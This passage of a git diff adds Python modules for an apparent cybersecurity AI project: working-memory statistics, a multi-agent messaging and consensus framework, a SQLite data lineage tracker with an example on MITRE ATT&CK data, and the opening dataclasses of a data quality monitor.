'max_capacity': self.capacity, + 'utilization': len(self._memory_items) / self.capacity + } + + # Activation distribution + if self._memory_items: + activations = [item.activation_level for item in self._memory_items.values()] + stats['avg_activation'] = sum(activations) / len(activations) + stats['max_activation'] = max(activations) + stats['min_activation'] = min(activations) + + # Item type distribution + type_counts = {} + for item in self._memory_items.values(): + type_counts[item.item_type] = type_counts.get(item.item_type, 0) + 1 + stats['item_types'] = type_counts + + # Context switch statistics + cursor = conn.execute(""" + SELECT COUNT(*), AVG(switch_cost) + 
FROM context_switches + WHERE timestamp > datetime('now', '-1 hour') + """) + row = cursor.fetchone() + stats['recent_switches'] = row[0] or 0 + stats['avg_switch_cost'] = row[1] or 0.0 + + # Current focus + if self._attention_focus: + stats['current_focus'] = { + 'type': self._attention_focus.focus_type, + 'items': len(self._attention_focus.focus_items), + 'weight': self._attention_focus.attention_weight, + 'duration_seconds': (datetime.now() - self._attention_focus.created_at).total_seconds() + } + else: + stats['current_focus'] = None + + return stats + + except Exception as e: + logger.error(f"Error getting working memory statistics: {e}") + return {'error': str(e)} + + def cleanup(self): + """Cleanup resources""" + self._decay_running = False + if self._decay_thread.is_alive(): + self._decay_thread.join(timeout=1.0) + +# Export the main classes +__all__ = ['WorkingMemoryManager', 'WorkingMemoryItem', 'AttentionFocus'] diff --git a/src/collaboration/multi_agent_framework.py b/src/collaboration/multi_agent_framework.py new file mode 100644 index 0000000000000000000000000000000000000000..7441bb401c4f24f3097ddc9e7b930b31c44ae989 --- /dev/null +++ b/src/collaboration/multi_agent_framework.py @@ -0,0 +1,588 @@ +""" +Multi-Agent Collaboration Framework for Cyber-LLM +Advanced agent-to-agent communication and swarm intelligence + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union, Callable +from dataclasses import dataclass, field +from enum import Enum +import numpy as np +from collections import defaultdict, deque +import websockets +import aiohttp + +from ..utils.logging_system import CyberLLMLogger, CyberLLMError, ErrorCategory +from ..memory.persistent_memory import PersistentMemoryManager +from ..cognitive.meta_cognitive import MetaCognitiveEngine + +class MessageType(Enum): + """Agent communication message types""" + 
TASK_REQUEST = "task_request" + TASK_RESPONSE = "task_response" + INFORMATION_SHARE = "information_share" + COORDINATION_REQUEST = "coordination_request" + CONSENSUS_PROPOSAL = "consensus_proposal" + CONSENSUS_VOTE = "consensus_vote" + CAPABILITY_ANNOUNCEMENT = "capability_announcement" + RESOURCE_REQUEST = "resource_request" + RESOURCE_OFFER = "resource_offer" + SWARM_DIRECTIVE = "swarm_directive" + EMERGENCY_ALERT = "emergency_alert" + +class AgentRole(Enum): + """Agent roles in the collaboration framework""" + LEADER = "leader" + SPECIALIST = "specialist" + COORDINATOR = "coordinator" + SCOUT = "scout" + ANALYZER = "analyzer" + EXECUTOR = "executor" + MONITOR = "monitor" + +class ConsensusAlgorithm(Enum): + """Consensus algorithms for decision making""" + MAJORITY_VOTE = "majority_vote" + WEIGHTED_VOTE = "weighted_vote" + BYZANTINE_FAULT_TOLERANT = "byzantine_fault_tolerant" + PROOF_OF_EXPERTISE = "proof_of_expertise" + RAFT = "raft" + +@dataclass +class AgentMessage: + """Inter-agent communication message""" + message_id: str + sender_id: str + recipient_id: Optional[str] # None for broadcast + message_type: MessageType + timestamp: datetime + + # Content + content: Dict[str, Any] + priority: int = 5 # 1-10, 10 = highest + + # Routing and delivery + ttl: int = 300 # Time to live in seconds + requires_acknowledgment: bool = False + correlation_id: Optional[str] = None + + # Security + signature: Optional[str] = None + encrypted: bool = False + +@dataclass +class AgentCapability: + """Agent capability description""" + capability_id: str + name: str + description: str + + # Performance metrics + accuracy: float + speed: float # Operations per second + resource_cost: float + + # Availability + available: bool = True + current_load: float = 0.0 + max_concurrent: int = 10 + + # Requirements + required_resources: Dict[str, float] = field(default_factory=dict) + dependencies: List[str] = field(default_factory=list) + +@dataclass +class SwarmTask: + """Task for swarm 
execution""" + task_id: str + description: str + task_type: str + + # Requirements + required_capabilities: List[str] + estimated_complexity: float + deadline: Optional[datetime] = None + + # Decomposition + subtasks: List['SwarmTask'] = field(default_factory=list) + dependencies: List[str] = field(default_factory=list) + + # Assignment + assigned_agents: List[str] = field(default_factory=list) + status: str = "pending" + + # Results + results: Dict[str, Any] = field(default_factory=dict) + completion_time: Optional[datetime] = None + +class AgentCommunicationProtocol: + """Standardized protocol for agent communication""" + + def __init__(self, agent_id: str, logger: Optional[CyberLLMLogger] = None): + self.agent_id = agent_id + self.logger = logger or CyberLLMLogger(name="agent_protocol") + + # Communication infrastructure + self.message_queue = asyncio.Queue() + self.active_connections = {} + self.message_handlers = {} + self.acknowledgments = {} + + # Protocol state + self.capabilities = {} + self.peer_agents = {} + self.conversation_contexts = {} + + # Security + self.trusted_agents = set() + self.encryption_keys = {} + + self.logger.info("Agent Communication Protocol initialized", agent_id=agent_id) + + async def send_message(self, message: AgentMessage) -> bool: + """Send message to another agent or broadcast""" + + try: + # Validate message + if not self._validate_message(message): + self.logger.error("Invalid message", message_id=message.message_id) + return False + + # Add timestamp and sender + message.timestamp = datetime.now() + message.sender_id = self.agent_id + + # Sign message if required + if message.encrypted or message.signature: + message = await self._secure_message(message) + + # Route message + if message.recipient_id: + # Direct message + success = await self._send_direct_message(message) + else: + # Broadcast message + success = await self._broadcast_message(message) + + # Handle acknowledgment requirement + if 
message.requires_acknowledgment and success: + asyncio.create_task(self._wait_for_acknowledgment(message)) + + self.logger.info("Message sent", + message_id=message.message_id, + recipient=message.recipient_id or "broadcast", + type=message.message_type.value) + + return success + + except Exception as e: + self.logger.error("Failed to send message", error=str(e)) + return False + + async def receive_message(self) -> Optional[AgentMessage]: + """Receive next message from queue""" + + try: + # Get message from queue (with timeout) + message = await asyncio.wait_for(self.message_queue.get(), timeout=1.0) + + # Validate and process message + if self._validate_received_message(message): + await self._process_received_message(message) + return message + + return None + + except asyncio.TimeoutError: + return None + except Exception as e: + self.logger.error("Failed to receive message", error=str(e)) + return None + + async def register_capability(self, capability: AgentCapability): + """Register agent capability""" + + self.capabilities[capability.capability_id] = capability + + # Announce capability to other agents + announcement = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # Broadcast + message_type=MessageType.CAPABILITY_ANNOUNCEMENT, + timestamp=datetime.now(), + content={ + "capability": { + "id": capability.capability_id, + "name": capability.name, + "description": capability.description, + "accuracy": capability.accuracy, + "speed": capability.speed, + "available": capability.available + } + } + ) + + await self.send_message(announcement) + + self.logger.info("Capability registered and announced", + capability_id=capability.capability_id, + name=capability.name) + +class DistributedConsensus: + """Distributed consensus mechanisms for multi-agent decisions""" + + def __init__(self, + agent_id: str, + communication_protocol: AgentCommunicationProtocol, + logger: Optional[CyberLLMLogger] = None): + + self.agent_id = 
agent_id + self.protocol = communication_protocol + self.logger = logger or CyberLLMLogger(name="consensus") + + # Consensus state + self.active_proposals = {} + self.voting_history = deque(maxlen=1000) + self.consensus_results = {} + + # Agent weights for weighted voting + self.agent_weights = {} + + self.logger.info("Distributed Consensus initialized", agent_id=agent_id) + + async def propose_consensus(self, + proposal_id: str, + proposal_content: Dict[str, Any], + algorithm: ConsensusAlgorithm = ConsensusAlgorithm.MAJORITY_VOTE, + timeout: int = 300) -> Dict[str, Any]: + """Propose a decision for consensus""" + + try: + proposal = { + "proposal_id": proposal_id, + "proposer": self.agent_id, + "content": proposal_content, + "algorithm": algorithm.value, + "created_at": datetime.now().isoformat(), + "timeout": timeout, + "votes": {}, + "status": "active" + } + + self.active_proposals[proposal_id] = proposal + + # Broadcast proposal + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # Broadcast + message_type=MessageType.CONSENSUS_PROPOSAL, + timestamp=datetime.now(), + content=proposal, + ttl=timeout + ) + + await self.protocol.send_message(message) + + # Wait for consensus or timeout + result = await self._wait_for_consensus(proposal_id, timeout) + + self.logger.info("Consensus proposal completed", + proposal_id=proposal_id, + result=result.get("decision"), + votes_received=len(result.get("votes", {}))) + + return result + + except Exception as e: + self.logger.error("Consensus proposal failed", error=str(e)) + return {"decision": "failed", "error": str(e)} + + async def vote_on_proposal(self, + proposal_id: str, + vote: Union[bool, float, str], + justification: Optional[str] = None) -> bool: + """Vote on an active proposal""" + + try: + if proposal_id not in self.active_proposals: + self.logger.warning("Unknown proposal", proposal_id=proposal_id) + return False + + proposal = 
self.active_proposals[proposal_id] + + # Create vote message + vote_content = { + "proposal_id": proposal_id, + "vote": vote, + "voter": self.agent_id, + "timestamp": datetime.now().isoformat(), + "justification": justification + } + + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=proposal["proposer"], + message_type=MessageType.CONSENSUS_VOTE, + timestamp=datetime.now(), + content=vote_content + ) + + await self.protocol.send_message(message) + + # Record vote locally + self.voting_history.append((datetime.now(), proposal_id, vote)) + + self.logger.info("Vote submitted", + proposal_id=proposal_id, + vote=vote) + + return True + + except Exception as e: + self.logger.error("Failed to vote on proposal", error=str(e)) + return False + +class SwarmIntelligence: + """Swarm intelligence capabilities for emergent behavior""" + + def __init__(self, + agent_id: str, + communication_protocol: AgentCommunicationProtocol, + memory_manager: PersistentMemoryManager, + logger: Optional[CyberLLMLogger] = None): + + self.agent_id = agent_id + self.protocol = communication_protocol + self.memory_manager = memory_manager + self.logger = logger or CyberLLMLogger(name="swarm_intelligence") + + # Swarm state + self.swarm_members = set() + self.role = AgentRole.SPECIALIST + self.current_tasks = {} + + # Intelligence mechanisms + self.pheromone_trails = defaultdict(float) + self.collective_knowledge = {} + self.emergence_patterns = {} + + # Task distribution + self.task_queue = asyncio.Queue() + self.completed_tasks = deque(maxlen=1000) + + self.logger.info("Swarm Intelligence initialized", agent_id=agent_id) + + async def join_swarm(self, swarm_id: str, role: AgentRole = AgentRole.SPECIALIST): + """Join a swarm with specified role""" + + try: + self.role = role + self.swarm_members.add(self.agent_id) + + # Announce joining + message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=None, # 
Broadcast + message_type=MessageType.INFORMATION_SHARE, + timestamp=datetime.now(), + content={ + "action": "join_swarm", + "swarm_id": swarm_id, + "role": role.value, + "agent_capabilities": list(self.protocol.capabilities.keys()) + } + ) + + await self.protocol.send_message(message) + + # Start swarm behaviors + asyncio.create_task(self._run_swarm_behaviors()) + + self.logger.info("Joined swarm", + swarm_id=swarm_id, + role=role.value) + + except Exception as e: + self.logger.error("Failed to join swarm", error=str(e)) + + async def distribute_task(self, task: SwarmTask) -> str: + """Distribute task across swarm members""" + + try: + # Analyze task requirements + task_requirements = await self._analyze_task_requirements(task) + + # Find suitable agents + suitable_agents = await self._find_suitable_agents(task_requirements) + + if not suitable_agents: + self.logger.warning("No suitable agents found for task", task_id=task.task_id) + return "failed" + + # Decompose task if needed + if len(task.required_capabilities) > 1 or task.estimated_complexity > 0.7: + subtasks = await self._decompose_task(task) + if subtasks: + # Distribute subtasks + for subtask in subtasks: + await self.distribute_task(subtask) + return "distributed" + + # Assign task to best agent + best_agent = await self._select_best_agent(suitable_agents, task_requirements) + + # Send task assignment + task_message = AgentMessage( + message_id=str(uuid.uuid4()), + sender_id=self.agent_id, + recipient_id=best_agent, + message_type=MessageType.TASK_REQUEST, + timestamp=datetime.now(), + content={ + "task": { + "id": task.task_id, + "description": task.description, + "type": task.task_type, + "complexity": task.estimated_complexity, + "deadline": task.deadline.isoformat() if task.deadline else None, + "requirements": task_requirements + } + }, + requires_acknowledgment=True + ) + + await self.protocol.send_message(task_message) + + # Update task status + task.assigned_agents = [best_agent] + task.status = 
"assigned" + self.current_tasks[task.task_id] = task + + self.logger.info("Task distributed", + task_id=task.task_id, + assigned_agent=best_agent) + + return "assigned" + + except Exception as e: + self.logger.error("Task distribution failed", error=str(e)) + return "failed" + + async def execute_collective_problem_solving(self, + problem: Dict[str, Any]) -> Dict[str, Any]: + """Execute collective problem solving using swarm intelligence""" + + try: + problem_id = problem.get("id", str(uuid.uuid4())) + + self.logger.info("Starting collective problem solving", problem_id=problem_id) + + # Phase 1: Problem decomposition + subproblems = await self._decompose_problem(problem) + + # Phase 2: Distribute subproblems + partial_solutions = [] + for subproblem in subproblems: + solution = await self._solve_subproblem_collectively(subproblem) + partial_solutions.append(solution) + + # Phase 3: Solution synthesis + final_solution = await self._synthesize_solutions(partial_solutions, problem) + + # Phase 4: Validation through consensus + validation_result = await self._validate_solution_collectively( + final_solution, problem) + + # Store in collective knowledge + self.collective_knowledge[problem_id] = { + "problem": problem, + "solution": final_solution, + "validation": validation_result, + "timestamp": datetime.now().isoformat(), + "participating_agents": list(self.swarm_members) + } + + # Update pheromone trails for successful patterns + if validation_result.get("valid", False): + await self._update_pheromone_trails(problem, final_solution) + + self.logger.info("Collective problem solving completed", + problem_id=problem_id, + solution_quality=validation_result.get("quality", 0.0)) + + return { + "problem_id": problem_id, + "solution": final_solution, + "validation": validation_result, + "collective_intelligence_applied": True + } + + except Exception as e: + self.logger.error("Collective problem solving failed", error=str(e)) + return {"problem_id": problem_id, "error": 
str(e)} + +class TaskDistributionEngine: + """Advanced task distribution and load balancing""" + + def __init__(self, logger: Optional[CyberLLMLogger] = None): + self.logger = logger or CyberLLMLogger(name="task_distribution") + self.agent_loads = defaultdict(float) + self.task_history = deque(maxlen=10000) + self.performance_metrics = defaultdict(dict) + + async def distribute_workload(self, + tasks: List[SwarmTask], + available_agents: Dict[str, AgentCapability]) -> Dict[str, List[str]]: + """Distribute workload optimally across agents""" + + try: + # Calculate agent scores for each task + task_assignments = {} + + for task in tasks: + best_agent = await self._find_optimal_agent(task, available_agents) + if best_agent: + if best_agent not in task_assignments: + task_assignments[best_agent] = [] + task_assignments[best_agent].append(task.task_id) + + # Update agent load + self.agent_loads[best_agent] += task.estimated_complexity + + self.logger.info("Workload distributed", + tasks_count=len(tasks), + agents_used=len(task_assignments)) + + return task_assignments + + except Exception as e: + self.logger.error("Workload distribution failed", error=str(e)) + return {} + +# Factory functions +def create_communication_protocol(agent_id: str, **kwargs) -> AgentCommunicationProtocol: + """Create agent communication protocol""" + return AgentCommunicationProtocol(agent_id, **kwargs) + +def create_distributed_consensus(agent_id: str, + protocol: AgentCommunicationProtocol, + **kwargs) -> DistributedConsensus: + """Create distributed consensus manager""" + return DistributedConsensus(agent_id, protocol, **kwargs) + +def create_swarm_intelligence(agent_id: str, + protocol: AgentCommunicationProtocol, + memory_manager: PersistentMemoryManager, + **kwargs) -> SwarmIntelligence: + """Create swarm intelligence engine""" + return SwarmIntelligence(agent_id, protocol, memory_manager, **kwargs) diff --git a/src/data/lineage_tracker.py b/src/data/lineage_tracker.py new file mode 
100644 index 0000000000000000000000000000000000000000..ce0746454a86e24658724572d0a0ee603b4f7e60 --- /dev/null +++ b/src/data/lineage_tracker.py @@ -0,0 +1,483 @@ +""" +Data Lineage Tracking System +Tracks data flow, transformations, and dependencies across the cybersecurity AI pipeline +""" + +import json +import sqlite3 +import hashlib +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, asdict +from enum import Enum + +class DataSourceType(Enum): + RAW_DATA = "raw_data" + MITRE_ATTACK = "mitre_attack" + CVE_DATABASE = "cve_database" + THREAT_INTEL = "threat_intel" + RED_TEAM_LOGS = "red_team_logs" + DEFENSIVE_KNOWLEDGE = "defensive_knowledge" + PREPROCESSED = "preprocessed" + TRANSFORMED = "transformed" + VALIDATED = "validated" + AUGMENTED = "augmented" + +class TransformationType(Enum): + CLEANING = "cleaning" + NORMALIZATION = "normalization" + TOKENIZATION = "tokenization" + AUGMENTATION = "augmentation" + VALIDATION = "validation" + FEATURE_EXTRACTION = "feature_extraction" + ANONYMIZATION = "anonymization" + AGGREGATION = "aggregation" + +@dataclass +class DataAsset: + """Represents a data asset in the lineage graph""" + asset_id: str + name: str + source_type: DataSourceType + file_path: str + size_bytes: int + checksum: str + created_at: str + schema_version: str + metadata: Dict[str, Any] + +@dataclass +class DataTransformation: + """Represents a data transformation operation""" + transformation_id: str + transformation_type: TransformationType + source_assets: List[str] + target_assets: List[str] + operation_name: str + parameters: Dict[str, Any] + executed_at: str + execution_time_seconds: float + success: bool + error_message: Optional[str] + +@dataclass +class DataLineageNode: + """Node in the data lineage graph""" + node_id: str + asset: DataAsset + upstream_nodes: List[str] + downstream_nodes: List[str] + transformations: List[str] + +class DataLineageTracker: + 
"""Tracks data lineage across the cybersecurity AI pipeline""" + + def __init__(self, db_path: str = "data/lineage/data_lineage.db"): + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + + def _init_database(self): + """Initialize the lineage database""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + # Data Assets table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS data_assets ( + asset_id TEXT PRIMARY KEY, + name TEXT NOT NULL, + source_type TEXT NOT NULL, + file_path TEXT NOT NULL, + size_bytes INTEGER NOT NULL, + checksum TEXT NOT NULL, + created_at TEXT NOT NULL, + schema_version TEXT NOT NULL, + metadata TEXT NOT NULL + ) + """) + + # Data Transformations table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS data_transformations ( + transformation_id TEXT PRIMARY KEY, + transformation_type TEXT NOT NULL, + source_assets TEXT NOT NULL, + target_assets TEXT NOT NULL, + operation_name TEXT NOT NULL, + parameters TEXT NOT NULL, + executed_at TEXT NOT NULL, + execution_time_seconds REAL NOT NULL, + success BOOLEAN NOT NULL, + error_message TEXT + ) + """) + + # Lineage Relationships table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS lineage_relationships ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + parent_asset_id TEXT NOT NULL, + child_asset_id TEXT NOT NULL, + transformation_id TEXT NOT NULL, + relationship_type TEXT NOT NULL, + created_at TEXT NOT NULL, + FOREIGN KEY (parent_asset_id) REFERENCES data_assets (asset_id), + FOREIGN KEY (child_asset_id) REFERENCES data_assets (asset_id), + FOREIGN KEY (transformation_id) REFERENCES data_transformations (transformation_id) + ) + """) + + # Create indices for performance + cursor.execute("CREATE INDEX IF NOT EXISTS idx_assets_source_type ON data_assets(source_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_transformations_type ON data_transformations(transformation_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS 
idx_relationships_parent ON lineage_relationships(parent_asset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_relationships_child ON lineage_relationships(child_asset_id)") + + conn.commit() + conn.close() + + def register_data_asset(self, asset: DataAsset) -> bool: + """Register a new data asset""" + try: + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + INSERT OR REPLACE INTO data_assets + (asset_id, name, source_type, file_path, size_bytes, checksum, + created_at, schema_version, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + asset.asset_id, asset.name, asset.source_type.value, + asset.file_path, asset.size_bytes, asset.checksum, + asset.created_at, asset.schema_version, json.dumps(asset.metadata) + )) + + conn.commit() + conn.close() + return True + + except Exception as e: + print(f"Error registering data asset: {e}") + return False + + def register_transformation(self, transformation: DataTransformation) -> bool: + """Register a data transformation operation""" + try: + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + INSERT OR REPLACE INTO data_transformations + (transformation_id, transformation_type, source_assets, target_assets, + operation_name, parameters, executed_at, execution_time_seconds, + success, error_message) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + transformation.transformation_id, transformation.transformation_type.value, + json.dumps(transformation.source_assets), json.dumps(transformation.target_assets), + transformation.operation_name, json.dumps(transformation.parameters), + transformation.executed_at, transformation.execution_time_seconds, + transformation.success, transformation.error_message + )) + + # Register lineage relationships + for source_id in transformation.source_assets: + for target_id in transformation.target_assets: + cursor.execute(""" + INSERT INTO lineage_relationships + (parent_asset_id, child_asset_id, transformation_id, relationship_type, created_at) + VALUES (?, ?, ?, ?, ?) + """, (source_id, target_id, transformation.transformation_id, "transformation", transformation.executed_at)) + + conn.commit() + conn.close() + return True + + except Exception as e: + print(f"Error registering transformation: {e}") + return False + + def get_asset_lineage(self, asset_id: str, direction: str = "both") -> Dict[str, Any]: + """Get the lineage graph for a specific asset""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + lineage = { + "asset_id": asset_id, + "upstream": [], + "downstream": [], + "transformations": [] + } + + # Get upstream lineage + if direction in ["upstream", "both"]: + cursor.execute(""" + SELECT DISTINCT lr.parent_asset_id, da.name, da.source_type, dt.operation_name + FROM lineage_relationships lr + JOIN data_assets da ON lr.parent_asset_id = da.asset_id + JOIN data_transformations dt ON lr.transformation_id = dt.transformation_id + WHERE lr.child_asset_id = ? 
+ """, (asset_id,)) + + lineage["upstream"] = [ + { + "asset_id": row[0], + "name": row[1], + "source_type": row[2], + "operation": row[3] + } + for row in cursor.fetchall() + ] + + # Get downstream lineage + if direction in ["downstream", "both"]: + cursor.execute(""" + SELECT DISTINCT lr.child_asset_id, da.name, da.source_type, dt.operation_name + FROM lineage_relationships lr + JOIN data_assets da ON lr.child_asset_id = da.asset_id + JOIN data_transformations dt ON lr.transformation_id = dt.transformation_id + WHERE lr.parent_asset_id = ? + """, (asset_id,)) + + lineage["downstream"] = [ + { + "asset_id": row[0], + "name": row[1], + "source_type": row[2], + "operation": row[3] + } + for row in cursor.fetchall() + ] + + # Get transformations involving this asset + cursor.execute(""" + SELECT dt.transformation_id, dt.operation_name, dt.executed_at, dt.success + FROM data_transformations dt + WHERE JSON_EXTRACT(dt.source_assets, '$') LIKE '%' || ? || '%' + OR JSON_EXTRACT(dt.target_assets, '$') LIKE '%' || ? 
|| '%' + """, (asset_id, asset_id)) + + lineage["transformations"] = [ + { + "transformation_id": row[0], + "operation_name": row[1], + "executed_at": row[2], + "success": bool(row[3]) + } + for row in cursor.fetchall() + ] + + conn.close() + return lineage + + def get_data_flow_impact(self, asset_id: str) -> Dict[str, Any]: + """Analyze the impact of changes to a specific data asset""" + lineage = self.get_asset_lineage(asset_id, direction="downstream") + + impact_analysis = { + "source_asset": asset_id, + "affected_assets": len(lineage["downstream"]), + "affected_asset_types": {}, + "critical_dependencies": [], + "recommendation": "" + } + + # Count affected asset types + for asset in lineage["downstream"]: + asset_type = asset["source_type"] + impact_analysis["affected_asset_types"][asset_type] = ( + impact_analysis["affected_asset_types"].get(asset_type, 0) + 1 + ) + + # Identify critical dependencies + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + cursor.execute(""" + SELECT da.asset_id, da.name, da.source_type + FROM data_assets da + WHERE da.source_type IN ('validated', 'augmented', 'transformed') + AND da.asset_id IN ( + SELECT lr.child_asset_id + FROM lineage_relationships lr + WHERE lr.parent_asset_id = ? 
+ ) + """, (asset_id,)) + + impact_analysis["critical_dependencies"] = [ + {"asset_id": row[0], "name": row[1], "type": row[2]} + for row in cursor.fetchall() + ] + + # Generate recommendation + if impact_analysis["affected_assets"] > 10: + impact_analysis["recommendation"] = "HIGH IMPACT: Changes require comprehensive testing" + elif impact_analysis["affected_assets"] > 5: + impact_analysis["recommendation"] = "MEDIUM IMPACT: Changes require targeted testing" + else: + impact_analysis["recommendation"] = "LOW IMPACT: Standard validation sufficient" + + conn.close() + return impact_analysis + + def generate_lineage_report(self) -> Dict[str, Any]: + """Generate a comprehensive data lineage report""" + conn = sqlite3.connect(self.db_path) + cursor = conn.cursor() + + report = { + "generated_at": datetime.now().isoformat(), + "summary": {}, + "asset_types": {}, + "transformation_types": {}, + "data_quality": {}, + "recommendations": [] + } + + # Summary statistics + cursor.execute("SELECT COUNT(*) FROM data_assets") + total_assets = cursor.fetchone()[0] + + cursor.execute("SELECT COUNT(*) FROM data_transformations") + total_transformations = cursor.fetchone()[0] + + cursor.execute("SELECT COUNT(*) FROM lineage_relationships") + total_relationships = cursor.fetchone()[0] + + report["summary"] = { + "total_assets": total_assets, + "total_transformations": total_transformations, + "total_relationships": total_relationships + } + + # Asset type distribution + cursor.execute(""" + SELECT source_type, COUNT(*), AVG(size_bytes) + FROM data_assets + GROUP BY source_type + """) + + for row in cursor.fetchall(): + report["asset_types"][row[0]] = { + "count": row[1], + "avg_size_bytes": row[2] + } + + # Transformation type distribution + cursor.execute(""" + SELECT transformation_type, COUNT(*), AVG(execution_time_seconds), + SUM(CASE WHEN success = 1 THEN 1 ELSE 0 END) * 100.0 / COUNT(*) + FROM data_transformations + GROUP BY transformation_type + """) + + for row in 
cursor.fetchall(): + report["transformation_types"][row[0]] = { + "count": row[1], + "avg_execution_time": row[2], + "success_rate": row[3] + } + + # Data quality metrics + cursor.execute(""" + SELECT + COUNT(*) as total, + SUM(CASE WHEN source_type IN ('validated', 'augmented') THEN 1 ELSE 0 END) as high_quality, + AVG(size_bytes) as avg_size + FROM data_assets + """) + + row = cursor.fetchone() + report["data_quality"] = { + "total_assets": row[0], + "high_quality_assets": row[1], + "quality_percentage": (row[1] / row[0] * 100) if row[0] > 0 else 0, + "average_asset_size": row[2] + } + + # Generate recommendations + if report["data_quality"]["quality_percentage"] < 70: + report["recommendations"].append("Increase data validation and quality assurance processes") + + if any(info["success_rate"] < 90 for info in report["transformation_types"].values()): + report["recommendations"].append("Review and optimize failing data transformations") + + if report["summary"]["total_relationships"] / report["summary"]["total_assets"] < 1.5: + report["recommendations"].append("Consider enriching data lineage tracking") + + conn.close() + return report + + def create_asset_from_file(self, file_path: str, source_type: DataSourceType, + name: Optional[str] = None, metadata: Optional[Dict] = None) -> DataAsset: + """Create a DataAsset from a file""" + path = Path(file_path) + + if not path.exists(): + raise FileNotFoundError(f"File not found: {file_path}") + + # Calculate file checksum + hasher = hashlib.sha256() + with open(path, 'rb') as f: + for chunk in iter(lambda: f.read(4096), b""): + hasher.update(chunk) + + asset_id = f"{source_type.value}_{hasher.hexdigest()[:16]}" + + return DataAsset( + asset_id=asset_id, + name=name or path.name, + source_type=source_type, + file_path=str(path.absolute()), + size_bytes=path.stat().st_size, + checksum=hasher.hexdigest(), + created_at=datetime.now().isoformat(), + schema_version="1.0", + metadata=metadata or {} + ) + +# Example usage and 
testing +if __name__ == "__main__": + # Initialize the tracker + tracker = DataLineageTracker("data/lineage/data_lineage.db") + + # Example: Track MITRE ATT&CK data processing + mitre_asset = DataAsset( + asset_id="mitre_attack_raw_001", + name="MITRE ATT&CK Framework Data", + source_type=DataSourceType.MITRE_ATTACK, + file_path="data/raw/mitre_attack.json", + size_bytes=1024000, + checksum="abc123def456", + created_at=datetime.now().isoformat(), + schema_version="1.0", + metadata={"version": "14.1", "techniques": 200} + ) + + tracker.register_data_asset(mitre_asset) + + # Track preprocessing transformation + preprocessing = DataTransformation( + transformation_id="preprocess_001", + transformation_type=TransformationType.CLEANING, + source_assets=["mitre_attack_raw_001"], + target_assets=["mitre_attack_clean_001"], + operation_name="clean_and_normalize_mitre_data", + parameters={"remove_deprecated": True, "normalize_names": True}, + executed_at=datetime.now().isoformat(), + execution_time_seconds=15.7, + success=True, + error_message=None + ) + + tracker.register_transformation(preprocessing) + + # Generate lineage report + report = tracker.generate_lineage_report() + print("Data Lineage Report:") + print(json.dumps(report, indent=2)) + + print("โœ… Data Lineage Tracking System implemented and tested") diff --git a/src/data/quality_monitor.py b/src/data/quality_monitor.py new file mode 100644 index 0000000000000000000000000000000000000000..4a2435bc776f521ec978c2b6e2c6af2715938013 --- /dev/null +++ b/src/data/quality_monitor.py @@ -0,0 +1,728 @@ +""" +Automated Data Quality Monitoring System +Monitors data quality metrics, detects anomalies, and ensures data integrity +""" + +import json +import sqlite3 +import numpy as np +import pandas as pd +from datetime import datetime, timedelta +from pathlib import Path +from typing import Dict, List, Optional, Any, Tuple +from dataclasses import dataclass, asdict +from enum import Enum +import hashlib +import re +import 
class QualityMetricType(Enum):
    """Dimensions of data quality that the monitor can measure."""
    COMPLETENESS = "completeness"
    ACCURACY = "accuracy"
    CONSISTENCY = "consistency"
    VALIDITY = "validity"
    UNIQUENESS = "uniqueness"
    TIMELINESS = "timeliness"
    RELEVANCE = "relevance"

class AlertSeverity(Enum):
    """Severity levels attached to data quality alerts."""
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"
    CRITICAL = "critical"

@dataclass
class QualityMetric:
    """Represents a data quality metric measurement"""
    metric_id: str                    # unique identifier for this measurement
    dataset_id: str                   # dataset the measurement applies to
    metric_type: QualityMetricType    # which quality dimension was measured
    value: float                      # measured value (thresholds suggest a 0..1 fraction)
    threshold_min: float              # lower acceptance bound for the value
    threshold_max: float              # upper acceptance bound for the value
    measured_at: str                  # ISO-8601 timestamp of the measurement
    passed: bool                      # whether the measurement satisfied its thresholds
    details: Dict[str, Any]           # free-form context about the check

@dataclass
class QualityAlert:
    """Represents a data quality alert"""
    alert_id: str                     # unique identifier for this alert
    dataset_id: str                   # dataset the alert concerns
    metric_type: QualityMetricType    # metric whose breach raised the alert
    severity: AlertSeverity           # how serious the breach is
    message: str                      # human-readable description of the breach
    value: float                      # measured value that triggered the alert
    threshold: float                  # threshold that was violated
    created_at: str                   # ISO-8601 creation time
    resolved_at: Optional[str]        # ISO-8601 resolution time, None while open
    resolved: bool                    # True once the alert has been closed

@dataclass
class DatasetProfile:
    """Statistical profile of a dataset"""
    dataset_id: str                   # dataset this profile describes
    total_records: int                # number of rows profiled
    total_columns: int                # number of columns profiled
    null_percentage: float            # share of null cells across the dataset
    duplicate_percentage: float       # share of duplicated records
    schema_hash: str                  # hash identifying the column schema
    last_updated: str                 # ISO-8601 timestamp of the last profiling run
    column_profiles: Dict[str, Any]   # per-column statistics keyed by column name
